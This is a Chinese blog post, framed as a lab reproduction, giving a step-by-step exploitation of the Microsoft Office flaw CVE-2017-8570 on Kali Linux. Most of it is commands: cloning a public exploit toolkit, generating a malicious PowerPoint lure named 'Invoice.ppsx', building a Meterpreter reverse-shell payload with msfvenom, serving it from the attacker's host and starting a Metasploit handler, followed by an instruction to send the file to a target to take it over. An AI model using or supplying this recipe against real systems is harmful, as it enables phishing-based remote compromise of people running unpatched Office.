美文网首页Ethical Hackers网络安全实验室
kali下CVE-2017-8570利用复现实验

kali下CVE-2017-8570利用复现实验

作者: 一点也不想吃辣 | 来源:发表于2017-08-20 15:06 被阅读77次

    参考:
    https://www.youtube.com/watch?v=jUhmPH_u6gs
    https://github.com/tezukanice/Office8570
    https://www.symantec.com/security_response/vulnerability.jsp?bid=99445
    https://www.rapid7.com/db/vulnerabilities/msft-cve-2017-8570

    简介:Microsoft Office容易出现远程代码执行漏洞。 攻击者可以利用此问题在当前登录的用户的上下文中执行任意代码。 漏洞尝试可能会导致拒绝服务条件。

    影响范围:
      Microsoft Office 2007 Service Pack 3
      Microsoft Office 2010 Service Pack 2 (32-bit editions)
      Microsoft Office 2010 Service Pack 2 (64-bit editions)
      Microsoft Office 2013 RT Service Pack 1
      Microsoft Office 2013 Service Pack 1 (32-bit editions)
      Microsoft Office 2013 Service Pack 1 (64-bit editions)
      Microsoft Office 2016 (32-bit edition)
      Microsoft Office 2016 (64-bit edition)

    cd /tmp
    git clone https://github.com/tezukanice/Office8570
    cd Office8570
    python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://监听者的IP/logo.doc
    这里会提示找不到文件,只需要创建template目录,然后把提示到的文件mv进去就ok,用到的文件会在报错最后一行提示
    再次执行一遍就成功了
    生成了Invoice.ppsx文件
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=监听者IP LPORT=监听者端口 -f exe > /tmp/shell.exe
    python cve-2017-8570_toolkit.py -M exp -e http://监听者IP/shell.exe -l /tmp/shell.exe
    
    msfconsole
    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 监听者IP
    set LPORT 监听者端口
    exploit
    
    将Invoice.ppsx传给目标,在目标打开这个ppt文件,拿下目标。
    
    在https://github.com/tezukanice/Office8570中,定义了三种不同情景的操作指导。
    
    
    另:apt-get install bleachbit -y 
    这个软件可以清理Linux电脑的一些缓存
    

    相关文章

      网友评论

        本文标题:kali下CVE-2017-8570利用复现实验

        本文链接:https://www.haomeiwen.com/subject/dlufdxtx.html